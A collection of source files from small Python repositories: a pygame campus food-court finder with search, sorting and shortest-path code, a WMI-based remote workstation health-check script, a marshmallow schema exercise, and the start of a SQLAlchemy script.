fc_update_box.input_text(event)\n if fc_only != -1:\n stall_update_box.input_text(event)\n if stall_only != -1:\n food_update_box.input_text(event)\n if food_only != -1:\n price_update_box.input_text(event)\n rating_update_box.input_text(event)\n pygame.display.flip()\n clock.tick(FPS)\n\n if subscreen4_counter == 1:\n mouseX = mouseY = 0\n used_food = used_price = used_rating = 0\n screen_running = True\n # input box\n fc_update_box = Inputbox(200, 10, 250, 75, \"Food Court Name: \", 15)\n stall_update_box = Inputbox(600, 10, 200, 75, \"Stall name: \", 15)\n food_update_box = Inputbox(500, 500, 250, 75, \"Food: \", 30)\n price_update_box = Inputbox(500, 600, 150, 75, \"Price: \", 30)\n rating_update_box = Inputbox(500, 700, 150, 75, \"Rating: \", 30)\n fc_only = stall_only = -1\n while screen_running:\n window_surface.fill(WHITE)\n mouse_pressed = pygame.mouse.get_pressed()\n if mouse_pressed[0]:\n mouseX, mouseY = pygame.mouse.get_pos()\n # back_button\n back_button4 = Button(0, HEIGHT_INIT - 75, 150, 75, \"BACK\", RED, 30)\n subscreen4_counter = back_button4.move_and_click(mouseX, mouseY, RED, subscreen4_counter, True)\n\n pygame.draw.line(window_surface, BLACK, [0, 95], [WIDTH_INIT, 95], 5)\n fc_list = get_fc_name(fc_update_box.string, foodcourt_list)\n\n for i in range(len(fc_list)):\n button = Button(0, 100 + 50 * i, 400, 50, \"\", GREY)\n fc_index = button.move_and_update(mouseX, mouseY, WHITE)\n try:\n fc_only = fc_list[int(fc_index)]\n fc_update_box.string = fc_only.name\n print(food_update_box.string)\n except:\n pass\n\n text = Textbox(0, 100 + 50 * i, 400, 50, fc_list[i].name, BLACK, 14)\n pygame.draw.line(window_surface, BLACK, [0, 150 + 50 * i], [400, 150 + 50 * i], 1)\n\n if fc_only != -1:\n stall_list = fc_only.getStallByName(stall_update_box.string)\n for i in range(len(stall_list)):\n button = Button(400, 100 + 50 * i, 400, 50, \"\", GREY)\n stall_index = 
button.move_and_update(mouseX, mouseY, WHITE)\n                        try:\n                            stall_only = stall_list[int(stall_index)]\n                            stall_update_box.string = stall_only.name\n                        except:\n                            pass\n                        text = Textbox(400, 100 + 50 * i, 400, 50, stall_list[i].name, BLACK, 14)\n                        pygame.draw.line(window_surface, BLACK, [400, 150 + 50 * i], [800, 150 + 50 * i], 1)\n                if stall_only != -1:\n                    text_update = Textbox(0, 0, WIDTH_INIT, HEIGHT_INIT - 100, \"ADD NEW FOOD!!!\", RED, 30)\n                    try:\n                        used_price = float(price_update_box.string)\n                        used_rating = float(rating_update_box.string)\n                        used_food = food_update_box.string\n                        if used_rating <= 5:\n                            update_button = Button(WIDTH_INIT - 150, HEIGHT_INIT - 75, 150, 75, \"ADD\", YELLOW, 30)\n                            subscreen4_counter = update_button.move_and_click(mouseX, mouseY, GREEN, subscreen4_counter,\n                                                                              True)\n                    except:\n                        pass\n\n                if not screen_running and used_price != 0 and used_rating != 0 and len(used_food) > 0:\n                    add(used_price, used_rating, fc_only.name, stall_only.name, used_food, foodcourt_list)\n                    file_update_data = open(\"main_data.txt\", \"wb\")\n                    pickle.dump(foodcourt_list, file_update_data)\n                    file_update_data.close()\n\n                for event in pygame.event.get():\n                    if event.type == pygame.QUIT:\n                        pygame.quit()\n                    fc_update_box.input_text(event)\n                    if fc_only != -1:\n                        stall_update_box.input_text(event)\n                    if stall_only != -1:\n                        food_update_box.input_text(event)\n                        price_update_box.input_text(event)\n                        rating_update_box.input_text(event)\n\n                pygame.display.flip()\n                clock.tick(FPS)\n\n        if mapscreen2_counter == 1:\n            # variable\n            mouseX = mouseY = 0\n            screen_running = True\n            used_graph3 = Graph()\n            used_graph3.vertex_set = [i for i in g.vertex_set]\n            draw_path = [i for i in shortest_path(used_graph3, posX, posY, map2_name, False)]\n            image = pygame.transform.scale(original_image, (WIDTH_INIT, HEIGHT_INIT))\n            while screen_running:\n                mouse_pressed = pygame.mouse.get_pressed()\n                if mouse_pressed[0]:\n                    mouseX, mouseY = pygame.mouse.get_pos()\n                window_surface.fill(WHITE)\n                window_surface.blit(image, (0, 0))\n                # back button\n                back_button_map = Button(0, HEIGHT_INIT - 75, 100, 75, \"BACK\", RED, 30)\n                mapscreen2_counter = back_button_map.move_and_click(mouseX, mouseY, RED, mapscreen2_counter, True)\n                # draw initial point\n                pygame.draw.circle(window_surface, RED, (posX, posY), 6)\n                # draw path\n                for i in range(len(draw_path) - 1):\n                    pygame.draw.line(window_surface, BLACK, draw_path[i], draw_path[i + 1], 5)\n                pygame.draw.line(window_surface, BLACK, draw_path[-1], (posX, posY), 5)\n                for event in pygame.event.get():\n                    if event.type == pygame.QUIT:\n                        pygame.quit()\n                pygame.display.flip()\n                clock.tick(FPS)\n\n\n################DATA#####################\n# this list contains foodcourt objects\n\n################DATA####################\n\n###define variables\n\n###main program\n\nmain()\n" }, { "alpha_fraction": 0.7427598237991333, "alphanum_fraction": 0.7546848654747009, "avg_line_length": 47.91666793823242, "blob_id": "61e0ce4d7b13bc5f3231230905a594934d7f853c", "content_id": "d67a0ac2727a6c46549ed2ac0e3940d3d829e7f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 587, "license_type": "no_license", "max_line_length": 168, "num_lines": 12, "path": "/README.txt", "repo_name": "nhanpotter/NTU-FoodBeverage", "src_encoding": "UTF-8", "text": "Hi!!!!\nThis is a Python app that provides users with canteen information on the NTU campus.\n\nHow to open this app:\n1. Open Terminal\n2. Install the pygame library with this command: pip install pygame\n3. Run file main_project.py\n4. 
Enjoy the app!!!!\n\nInstructions:\n1. Update your location by clicking on the map. (Remember you can zoom in and zoom out with the \"[\" and \"]\" buttons; move the map with the 4 arrow keys.) Click Submit when you finish.\n2. On the main page, there are Food Court lists, a Search Engine, an Update Information feature and an Add New Food feature. This app is very user-friendly, so have fun!!!!\n" }, { "alpha_fraction": 0.5894466042518616, "alphanum_fraction": 0.5956671237945557, "avg_line_length": 34.272727966308594, "blob_id": "b45011bca914804be0dc240cd289408685e9a88e", "content_id": "30e0ef2ea549036613cd0ef0203d6b85b826e890", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4662, "license_type": "no_license", "max_line_length": 151, "num_lines": 132, "path": "/sort_and_search.py", "repo_name": "nhanpotter/NTU-FoodBeverage", "src_encoding": "UTF-8", "text": "def search_by_food(foodname, foodcourt_list):\n    __results = []\n    for foodcourts in foodcourt_list:\n        list1 = foodcourts.searchFoodByName(\n            foodname)  # extracting each result out, because the searchFoodByName function returns a list of dicts\n        for result in list1:\n            __results.append(result)\n    return __results\n\n\ndef search_by_price(min_price, max_price, foodcourt_list):\n    __results = []\n    for foodcourts in foodcourt_list:\n        list1 = foodcourts.searchByPrice(min_price,\n                                         max_price)  # extracting each result out, because the searchByPrice function returns a list of dicts.\n        for result in list1:\n            __results.append(result)\n    return __results\n\n\ndef merge(left_list, right_list, key_name, reverse):\n    result_list = []\n\n    # while both the left and right lists have elements\n    while left_list and right_list:\n        if not reverse:\n            if left_list[0][key_name] < right_list[0][key_name]:\n                result_list.append(left_list[0])\n                left_list.pop(0)\n            else:\n                result_list.append(right_list[0])\n                right_list.pop(0)\n        else:\n            if left_list[0][key_name] > right_list[0][key_name]:\n                result_list.append(left_list[0])\n                left_list.pop(0)\n            else:\n                result_list.append(right_list[0])\n                right_list.pop(0)\n    # the left list still contains elements; append its contents to the end of the result list\n    if left_list:\n        result_list.extend(left_list)\n    else:\n        # the right list still contains elements. 
Append its contents to end of the result list\n        result_list.extend(right_list)\n\n    return result_list\n\n\ndef mergesort(list_of_items, key_name, reverse):\n    list_len = len(list_of_items)\n\n    # base case\n    if list_len < 2:\n        return list_of_items\n    left_list = list_of_items[:list_len // 2]  # //\n    right_list = list_of_items[list_len // 2:]  # \"//\" to force division\n\n    # merge sort left and right list recursively\n    left_list = mergesort(left_list, key_name, reverse)\n    right_list = mergesort(right_list, key_name, reverse)\n    return merge(left_list, right_list, key_name, reverse)\n\n# def sortBy(__result, key_name,sortBy):\n#     __result = sorted(__result, key=lambda k: k[key_name],\n#                       reverse=sortBy)  # sort the results according to price/ ratings\n#     return __result\n\n\ndef search_by_category(user_food_category, foodcourt_list):\n    __results = []\n    for foodcourts in foodcourt_list:\n        list1 = foodcourts.searchByCategory(\n            user_food_category)  # extracting each result out from the dict, because searchByCategory function returns a list of dict.\n        for result in list1:\n            __results.append(result)\n    return __results\n\ndef search_by_aircon_availability(items):\n    __results = []\n    for i in items:\n        if i[\"Aircon Availability\"] == \"Yes\":\n            __results.append(i)\n    return __results\n\n\ndef search_for_foodlist(user_fcname, user_stallname, foodcourt_list):\n    __results = []\n    for fc in foodcourt_list:\n        if fc.name == user_fcname:\n            stall = fc.getStallByName(user_stallname)\n            list1 = stall.getFoods()\n            for result in list1:\n                __results.append(result)\n    return __results\n\ndef intersection(list1, list2):\n    __results = []\n    for i in list1:\n        for j in list2:\n            if i == j:\n                __results.append(i)\n    return __results\n\ndef get_all_stalls(foodcourt_list):\n    __results = []\n    for fc in foodcourt_list:\n        list1 = fc.getStalls()\n        for i in list1:\n            __results.append(i)\n    return __results\n\ndef get_fc_name(user_input, foodcourt_list):\n    __results = []\n    for fc in foodcourt_list:\n        if user_input.lower() in fc.name.lower():\n            __results.append(fc)\n    return __results\n\ndef update(new_price, new_rating, fc_name, stall_name, food_name, foodcourt_list):\n    for fc in foodcourt_list:\n        if fc_name.lower() == fc.name.lower():\n            for stall in fc.stall_list:\n                if stall_name.lower() == stall.name.lower():\n                    for food in stall.food_list:\n                        if food_name.lower() == food.name.lower():\n                            food.price = new_price\n                            food.rating = new_rating\n\ndef add(new_price, new_rating, fc_name, stall_name, food_name, foodcourt_list):\n    for fc in foodcourt_list:\n        if fc_name.lower() == fc.name.lower():\n            fc.addFood(stall_name, food_name, new_price, new_rating)\n" }, { "alpha_fraction": 0.6027960777282715, "alphanum_fraction": 0.6036184430122375, "avg_line_length": 32.80555725097656, "blob_id": "db9ea306249802c32cb102768c0576448c4783b5", "content_id": "019c6dd1642a927284365027b5bcce45b23c4866", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1216, "license_type": "no_license", "max_line_length": 95, "num_lines": 36, "path": "/shortest_distance.py", "repo_name": "nhanpotter/NTU-FoodBeverage", "src_encoding": "UTF-8", "text": "import heapq\n\ndef shortest_path(g, posX, posY, end_ver, number):\n    queue = []\n    init_index = g.set_start(posX, posY)\n    heapq.heappush(queue, g.vertex_set[init_index])\n\n    while len(queue) > 0:\n        actual_vertex = heapq.heappop(queue)\n        use_index = g.get_index(actual_vertex.name)\n        g.vertex_set[use_index].visited = True\n        for key, value in actual_vertex.adjacent.items():\n            index = g.get_index(key)\n            new_distance 
= actual_vertex.distance + value\n if not g.vertex_set[index].visited and new_distance < g.vertex_set[index].distance:\n g.vertex_set[index].predecessor = g.vertex_set[use_index]\n g.vertex_set[index].distance = new_distance\n heapq.heappush(queue,g.vertex_set[index])\n\n final_index = g.get_index(end_ver)\n node = g.vertex_set[final_index]\n if number == True:\n return node.distance\n else:\n path = []\n while node is not None:\n path.append(node.coordinates)\n node = node.predecessor\n return path\n\n\n\n # print(\"Shortest path to target is: \",node.distance)\n # while node is not None:\n # print(node.name)\n # node = node.predecessor" } ]
4
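A minimal usage sketch for the mergesort helper defined in sort_and_search.py above; the rows below are invented for illustration, but the key names ("Price", "Rating") and the mergesort(list_of_items, key_name, reverse) signature are taken from the files in this record:

# hypothetical result rows shaped like the search results built in main_project.py
rows = [
    {"Food Name": "Laksa", "Price": 4.5, "Rating": 4.0},
    {"Food Name": "Chicken Rice", "Price": 3.0, "Rating": 4.5},
]
cheapest_first = mergesort(rows, "Price", False)   # reverse=False sorts ascending
best_rated_first = mergesort(rows, "Rating", True)  # reverse=True sorts descending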
MattPlahuta/computer-health-in-python
https://github.com/MattPlahuta/computer-health-in-python
1cd3877960dd943078db7f91ffa254f474064dcf
89c39dd47fd3090f2f42a20cc90725c84b6ac846
7bb9b1375d55a7dfe7a46cd24c56a44c1e860df6
refs/heads/master
2021-04-15T08:49:49.261223
2018-03-23T17:23:36
2018-03-23T17:23:36
126,516,087
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7857142686843872, "alphanum_fraction": 0.7857142686843872, "avg_line_length": 27, "blob_id": "b89102b6e627ad317d64e1b52f22a3e37fd2c557", "content_id": "ce64ae9d89b312b11d881f9b7af88351116889ba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 28, "license_type": "no_license", "max_line_length": 27, "num_lines": 1, "path": "/README.md", "repo_name": "MattPlahuta/computer-health-in-python", "src_encoding": "UTF-8", "text": "# computer-health-in-python\n" }, { "alpha_fraction": 0.5266630053520203, "alphanum_fraction": 0.540948748588562, "avg_line_length": 49.381866455078125, "blob_id": "dca95527a99f3283a4db82ce6c5949875a007f5f", "content_id": "6afd87fa6e305ff684189ada00775f1e8017dbd0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 18340, "license_type": "no_license", "max_line_length": 209, "num_lines": 364, "path": "/PC_Health.py", "repo_name": "MattPlahuta/computer-health-in-python", "src_encoding": "UTF-8", "text": "# Python 2.7 program \n# Remote Workstation health\n# 11/29/2017\n# by Matthew R. Plahuta\n\nfrom subprocess import check_output\nimport wmi\nimport socket\nimport win32com.client\nimport os, time\n\nclass PcHealth:\n \"\"\"\n This Class was designed to gather important workstation health information and will aid you in troubleshooting and \n will result in a faster soulution for our clients.\n \"\"\"\n def __init__(self, hostname):\n self.ava_code = { 1 : 'Other', 2 : 'Unknown', 3 : 'Running / Full Power', 4 : 'Warning', 5 : 'In Test', 6 : 'Not Applicable',\n 7 : 'Power Off', 8 : 'Off Line', 9 : 'Off Duty', 10 : 'Degraded', 11 : 'Degraded', 12 : 'Install Error', \n 13 : 'Power Save - Unknown ', 14 : 'Power Save - Low Power Mode', 15 : 'Power Save - Standby', 16 : 'Power Cycle ', 17 : \n 'Power Save - Warning', 18 : 'Paused', 19 : 'Not Ready', 20 : 'Not Configured', 21 : 'Quiesced'}\n\n self.conf_er_code = { 0 : 'This device is working properly.', 1 : 'This device is not configured correctly.', 2 : 'Windows cannot load the driver for this device.', \n 3 : 'The driver for this device might be corrupted, or your system may be running low on memory or other resources.', 4 : \n 'This device is not working properly. One of its drivers or your registry might be corrupted.', 5 : 'The driver for this device needs a resource that Windows cannot manage.',\n 6 : 'The boot configuration for this device conflicts with other devices.', 7 : 'Cannot filter.', 8 : 'The driver loader for the device is missing.',\n 9 : 'This device is not working properly because the controlling firmware is reporting the resources for the device incorrectly.', \n 10 : 'This device cannot start.', 11 : 'This device failed.', 12 : 'This device cannot find enough free resources that it can use.', \n 13 : 'Windows cannot verify this device\\'s resources.', 14 : 'This device cannot work properly until you restart your computer.', \n 15 : 'This device is not working properly because there is probably a re-enumeration problem.', 16 : 'Windows cannot identify all the resources this device uses.',\n 17 : 'This device is asking for an unknown resource type.', 18 : 'Reinstall the drivers for this device.', 19 : 'Failure using the VxD loader.', \n 20 : 'Your registry might be corrupted.', 21 : 'System failure: Try changing the driver for this device. If that does not work, see your hardware documentation. 
Windows is removing this device.', \n                                22 : 'This device is disabled.', 23 : 'System failure: Try changing the driver for this device. If that doesn\\'t work, see your hardware documentation.', \n                                24 : 'This device is not present, is not working properly, or does not have all its drivers installed.', 25 : 'Windows is still setting up this device.', \n                                26 : 'Windows is still setting up this device.', 27 : 'This device does not have valid log configuration.', 28 : 'The drivers for this device are not installed.', \n                                29 : 'This device is disabled because the firmware of the device did not give it the required resources.', 30 : 'This device is using an Interrupt Request (IRQ) resource that another device is using.',\n                                31 : 'This device is not working properly because Windows cannot load the drivers required for this device.' }\n\n        self.prt_state = { 0 : 'Idle', 1 : 'Paused', 2 : 'Error', 3 : 'Pending Deletion', 4 : 'Paper Jam', 5 : 'Paper Out', 6 : 'Manual Feed', \n        7 : 'Paper Problem', 8 : 'Offline', 9 : 'I/O Active', 10 : 'Busy', 11 : 'Printing', 12 : 'Output Bin Full', 13 : 'Not Available', 14 : 'Waiting', 15 : 'Processing', \n        16 : 'Initialization', 17 : 'Warming Up', 18 : 'Toner Low', 19 : 'No Toner', 20 : 'Page Punt', 21 : 'User Intervention Required', 22 : 'Out of Memory', 23 : 'Door Open', \n        24 : 'Server_Unknown', 25 : 'Power Save' }\n        \n        self.hostname = hostname\n\n        try:\n            self.c = wmi.WMI(hostname)    # Attempts to create a WMI session with the remote computer\n            objWMIService = win32com.client.Dispatch(\"WbemScripting.SWbemLocator\")\n            self.objSWbemServices = objWMIService.ConnectServer(hostname,\"root\\cimv2\")\n        except Exception as e:\n            #print e\n            print \"Can't resolve the host or the workstation is offline.\"\n            x = raw_input(\"Press Enter to exit\")\n            exit(1)\n        m = self.main()    # Calls the main function\n\n    def last_build(self):\n        \"\"\" This function is used to get the last build date on the remote workstation \"\"\"\n        print \"---------------------------------\"\n        print \"Basic information for workstation:\"\n        print \"---------------------------------\"\n        file_list = []\n        try:\n            directory = \"\\\\\\\\\"+(self.hostname)+\"File location\"    # Grabs the names of the files in the build_results folder\n            for i in os.listdir(directory):\n                a = os.stat(os.path.join(directory, i))\n                file_list.append([time.ctime(a.st_atime)])\n            print \"Build Completed: \" + str(file_list)\n        except Exception as e:\n            #print e\n            print \"Cannot find build results.\"\n\n    def os_system_info(self):\n        \"\"\" This function is used to get basic operating system information for a remote workstation\"\"\"\n        try: \n            for op_sys in self.c.Win32_OperatingSystem():    # Grabs operating system info from the remote host; loop variable renamed so the os module is not shadowed\n                op_sys = op_sys.Caption\n            colItems = self.objSWbemServices.ExecQuery(\"SELECT * FROM Win32_ComputerSystem\")\n            for objItem in colItems:\n                if objItem.Model != None:\n                    pc_model = str(objItem.Model)\n            print op_sys\n            print pc_model\n            print self.hostname.upper()\n        except Exception as e:\n            #print e\n            print \"Unable to get operating system information.\"\n\n    def system_uptime(self):\n        \"\"\" This function is used to gather System Uptime information for a remote workstation\"\"\"\n        try:\n            secs_up = int([uptime.SystemUpTime for uptime in self.c.Win32_PerfFormattedData_PerfOS_System()][0])    # Grabs PC Uptime in seconds\n            minutes_up = secs_up / 60\n            hours_up = secs_up / 3600    # Converts the uptime in seconds to days, hours, and minutes\n            days_up = hours_up / 24\n            if minutes_up > 0:\n                day = days_up\n                hour = hours_up - (day * 24)\n                minute = minutes_up - (hours_up * 60)\n                print \"Machine Uptime: \", day, \"days\", hour, \"hours\", minute, \"minutes\"\n        except Exception as e:\n            #print e\n            print \"Unable to pull uptime information.\"\n        print\n\n    def network_info(self):\n        \"\"\" This function gathers network information for a remote workstation\"\"\"\n        print \"-------------------\"\n        print \"Network Information:\"\n        print \"-------------------\"\n        try:\n            for interface in self.c.Win32_NetworkAdapterConfiguration(IPEnabled=1):    # Grabs and prints IP and MAC information\n                print \"MAC: \" + interface.MACAddress\n                print \"IPv4: \" + interface.IPAddress[0]\n                #print \"IPv6: \" + interface.IPAddress[1] \n        except Exception as e:\n            #print e\n            print \"Cannot get \" + self.hostname + \"'s IPs or MAC address.\"\n        \n        try:\n            colItems = self.objSWbemServices.ExecQuery(\"SELECT * FROM Win32_NetworkAdapter\")    # Grabs information from the network adapter\n            for objItem in colItems:\n                if objItem.AdapterType != None:\n                    x = str(objItem.AdapterType)\n                    if x == 'Ethernet 802.3':\n                        if objItem.Description != None:\n                            print \"NIC: \" + str(objItem.Description)\n                        if objItem.Availability != None:\n                            num = int(objItem.Availability)\n                            print \"Availability: \" + self.ava_code[num]\n                        if objItem.ConfigManagerErrorCode != None:\n                            num = int(objItem.ConfigManagerErrorCode)\n                            print self.conf_er_code[num]\n                        if objItem.Speed != None:\n                            speed = str(objItem.Speed)\n                            if speed == '1000000000':\n                                print \"Speed: 1GB\"\n                            elif speed == '100000000':\n                                print \"Speed: 100MB\"\n                            else:\n                                print \"Speed: \" + speed + \" bps\"\n                        print \n        except Exception as e:\n            #print e\n            print \"Unable to gather information from the network adapter.\" \n\n    def mem_cpu(self):\n        \"\"\" This function is used to print Memory and CPU information for a remote workstation\"\"\"\n        print \"--------------------\"\n        print \"Memory and CPU Usage:\"\n        print \"--------------------\"\n        try: \n            for i in self.c.Win32_ComputerSystem():    ### TODO: try putting all the try statements in one place\n                totalMem = int(i.TotalPhysicalMemory)\n                totalMem = totalMem / 1000000000\n            pct_in_use = int([mem.PercentCommittedBytesInUse for mem in self.c.Win32_PerfFormattedData_PerfOS_Memory()][0])\n            utilizations = [cpu.LoadPercentage for cpu in self.c.Win32_Processor()]\n            utilization = int(sum(utilizations) / len(utilizations))    # avg all cores/processors\n            print \"Total memory: \", totalMem, \"GB\"\n            print \"Percent of memory in use: \", pct_in_use, \"%\"\n            print \"Percent of CPU utilization: \", utilization, \"%\"\n        except Exception as e:\n            #print e\n            print \"Unable to pull memory and CPU information.\"\n        print\n\n    def motherboard_info(self):\n        \"\"\" This function is used to gather motherboard information for a remote workstation\"\"\"\n        print \"-----------\"\n        print \"Motherboard: \"\n        print \"-----------\"\n        try:\n            colItems = self.objSWbemServices.ExecQuery(\"SELECT * FROM Win32_BaseBoard\")\n            for objItem in colItems:\n                if objItem.SerialNumber != None:\n                    print \"SerialNumber: \" + str(objItem.SerialNumber)\n                if objItem.Status != None:\n                    print \"Status: \" + str(objItem.Status)\n            colItems = self.objSWbemServices.ExecQuery(\"SELECT * FROM Win32_MotherboardDevice\")\n            for objItem in colItems:\n                if objItem.Availability != None:\n                    num = int(objItem.Availability)\n                    print \"Availability: \" + self.ava_code[num]\n        except Exception as e:\n            #print e\n            print \"Unable to get Motherboard information.\"\n        print\n\n    def drive_size(self):\n        \"\"\" This function is used to gather drive size for a remote workstation\"\"\"\n        print \"----------\"\n        print \"Drive Size: \"\n        print 
\"----------\"\n try:\n for d in self.c.Win32_LogicalDisk():\n drive = str(d.Caption)\n if d.FreeSpace == None:\n free = 0\n else:\n free = float(d.FreeSpace)\n free = float(\"{0:.2f}\".format(free / 1073741824))\n if d.Size == None:\n size = 0\n else:\n size = int(d.size)\n size = size / 1000000000\n print \"Disk: \", drive, \" Free GB: \", free, \" Total GB: \", size\n except Exception as e:\n #print e\n print \"Unable to get Drive Size information.\"\n print\n\n def drive_info(self):\n \"\"\" This function is used to gather drive information for a remote workstation\"\"\"\n print \"-----------\"\n print \"Disk Drives: \"\n print \"-----------\"\n try:\n colItems = self.objSWbemServices.ExecQuery(\"SELECT * FROM Win32_DiskDrive\")\n for objItem in colItems:\n if objItem.Model != None:\n print \"Model: \" + str(objItem.Model)\n if objItem.Name != None:\n print \"Name: \" + str(objItem.Name)\n if objItem.InterfaceType != None:\n print \"InterfaceType: \" + str(objItem.InterfaceType)\n if objItem.Status != None:\n print \"Status: \" + str(objItem.Status)\n if objItem.ConfigManagerErrorCode != None:\n num = int(objItem.ConfigManagerErrorCode)\n print self.conf_er_code[num]\n if objItem.Availability != None:\n num = int(objItem.Availability)\n print \"Availability: \" + self.ava_code[num]\n print\n except Exception as e:\n #print e\n print \"Unable to get disk drive information.\"\n print\n\n def fan_info(self):\n \"\"\" This function is used to gather fan information for a remote workstation\"\"\"\n print \"---------------\"\n print \"Fan information: \"\n print \"---------------\"\n try:\n colItems = self.objSWbemServices.ExecQuery(\"SELECT * FROM Win32_Fan\")\n for objItem in colItems:\n if objItem.Name != None:\n print \"Name: \" + str(objItem.Name)\n if objItem.Availability != None:\n num = int(objItem.Availability)\n print \"Availability: \" + self.ava_code[num]\n if objItem.Status != None:\n print \"Status: \" + str(objItem.Status)\n if objItem.ConfigManagerErrorCode != None:\n num = int(objItem.ConfigManagerErrorCode)\n print self.conf_er_code[num]\n except Exception as e:\n #print e\n print \"Unable to get Fan information.\"\n print\n\n def usb_info(self):\n \"\"\" This function is used to gather USB information for a remote workstation\"\"\"\n print \"---------------------\"\n print \"USB ports on computer:\"\n print \"---------------------\"\n try:\n for usb in self.c.InstancesOf(\"Win32_UsbHub\"): # Runs a loop to get the names of each USB on the remote host\n print 'Name: ' + usb.Name\n except Exception as e:\n #print e\n print \"Unable to gather USB information.\"\n print\n\n def printer_info(self):\n \"\"\"This funtion is used to gather printer information from a remote workstation\"\"\"\n colItems = self.objSWbemServices.ExecQuery(\"SELECT * FROM Win32_Printer\")\n print \"-------------------\"\n print \"Printer Information:\"\n print \"-------------------\"\n print\n try:\n for objItem in colItems:\n strList = \" \"\n try:\n print \"CapabilityDescriptions: \",\n for objElem in objItem.CapabilityDescriptions :\n strList = strList + str(objElem) + \", \"\n except:\n strList = strList + 'null'\n print strList\n if objItem.Caption != None:\n print \"Caption: \" + str(objItem.Caption)\n if objItem.DriverName != None:\n print \"DriverName: \" + str(objItem.DriverName)\n if objItem.ConfigManagerErrorCode != None:\n num = int(objItem.ConfigManagerErrorCode)\n print \"Error Status: \" + self.conf_er_code[num] \n if objItem.PrinterState != None:\n num = int(objItem.PrinterState)\n 
print \"Print State: \" + self.prt_state[num]\n if objItem.Shared != None:\n print \"Shared: \" + str(objItem.Shared)\n if objItem.ShareName != None:\n print \"ShareName: \" + str(objItem.ShareName)\n if objItem.SpoolEnabled != None:\n print \"SpoolEnabled: \" + str(objItem.SpoolEnabled)\n print\n except Exception as e:\n #print e\n print \"Unable to get printer information\"\n\n def socket_connect(self):\n \"\"\" This function is used to attempt a socket creation for a remote workstation\"\"\"\n print \"-----------------\"\n print \"Socket Connection:\"\n print \"-----------------\"\n print\n try: \n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Calls socket\n s.connect((self.hostname, 3389)) # Connects to socket on port 3389\n\n print \"Socket connection successfully, should be able to RDP.\" \n s.close() \n except Exception as e:\n #print e \n print \"Socket failed to connect.\" \n print\n\n def ping_results(self):\n \"\"\" This function is used to attempt a ping to a remote workstation\"\"\"\n print \"----\"\n print \"Ping:\"\n print \"----\"\n try:\n socket.gethostbyname(self.hostname) # Uses socket to resolve host \n output = check_output([\"ping\", self.hostname]) # Runs ping for Windows\n print output\n except Exception as e:\n #print e\n print \"Unable to Ping.\"\n\n def main(self):\n \"\"\" Runs all functions to gather the data for a remote workstation\"\"\"\n self.last_build()\n self.os_system_info()\n self.system_uptime()\n self.network_info()\n self.mem_cpu()\n self.motherboard_info()\n self.drive_size()\n self.drive_info()\n self.fan_info()\n self.usb_info()\n self.printer_info()\n self.socket_connect()\n self.ping_results()\n x = raw_input(\"Press Enter to exit\")\n\nos.system('cls') # Clears the screen\nhostname = raw_input('Enter the computer hostname: ') # Provides input for hostname to gather information\npc = PcHealth(hostname) # Calls The class \n" } ]
2
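A minimal sketch of the WMI query pattern PC_Health.py relies on, assuming the same third-party wmi package the script imports; the hostname and the two-entry availability table are illustrative stand-ins for the full ava_code dict defined in the class:

import wmi

ava_code = {3: 'Running / Full Power', 8: 'Off Line'}  # abbreviated from the full table in PC_Health.py
c = wmi.WMI('localhost')  # hypothetical host; the script passes a user-supplied hostname
for nic in c.Win32_NetworkAdapter():
    if nic.AdapterType == 'Ethernet 802.3' and nic.Availability is not None:
        print('%s: %s' % (nic.Description, ava_code.get(int(nic.Availability), 'Unknown code')))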
ShyGuyPy/Workflow_py
https://github.com/ShyGuyPy/Workflow_py
6385f2f58ecfbd69a3918c85389b281320cc4087
73a534584ac84d8dde35d19086b264cae8b0c17e
cb247c30480fa9eb84870089169b22d463a928fb
refs/heads/master
2023-06-24T13:49:02.544628
2023-06-14T19:16:14
2023-06-14T19:16:14
186,460,300
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6721581816673279, "alphanum_fraction": 0.6738055944442749, "avg_line_length": 28.634145736694336, "blob_id": "fae44b040cce7ea0bb6e490afaf45de5736f68de", "content_id": "c5a5c1699f4abb58d9cd316a594c2688a51c786a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1214, "license_type": "no_license", "max_line_length": 102, "num_lines": 41, "path": "/marshmallow_practice.py", "repo_name": "ShyGuyPy/Workflow_py", "src_encoding": "UTF-8", "text": "t#stepping through an interesting marshmallow tutorial\n#https://www.youtube.com/watch?v=S7Fh5XnuhPU\n\nfrom marshmallow import Schema, fields, pprint, post_load\n\nclass Player(object):\n def __init__(self, name, level, my_class):\n self.name = name\n self.level = level\n self.my_class = my_class\n\n def __repr__(self):\n return '{} is a level {} {}'.format(self.name, self.level, self.my_class)\n\nclass PlayerSchema(Schema):\n name = fields.String()\n level = fields.Integer()\n my_class = fields.String()\n\n #this automatically instantiates the Player class\n @post_load\n def create_player(self,data):\n return Player(**data)\n #this is same as 'return Player(name, level, my_class)\n\ninput_dict= {}\n\ninput_dict['name'] = input(\"Name thyself: \")\ninput_dict['level'] = input(\"what level have you achieved...be honest: \")\ninput_dict['my_class'] = input(\"What is your class?: \")\n\n#the_player = Player(name=input_dict['name'], level=input_dict['level'], my_class=input_dict['class'])\n\nschema = PlayerSchema()\n#result = schema.dump(the_player)\nresult = schema.load(input_dict)\n\npprint(result.data)\npprint(input_dict['my_class'])\n#pprint(the_player)\nprint(result.errors)" }, { "alpha_fraction": 0.5037540197372437, "alphanum_fraction": 0.5291383862495422, "avg_line_length": 24.42727279663086, "blob_id": "bf83432d05c9cf2133ba57021047c4c6b6b0f44e", "content_id": "7aa6c266b70bf98697f9ce248bc79ea6678fcc32", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2797, "license_type": "no_license", "max_line_length": 96, "num_lines": 110, "path": "/Aqueduct_test.py", "repo_name": "ShyGuyPy/Workflow_py", "src_encoding": "UTF-8", "text": "from numpy import genfromtxt\nfrom time import time\nfrom datetime import datetime\nfrom sqlalchemy import Column, Integer, Float, Date\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\ndef 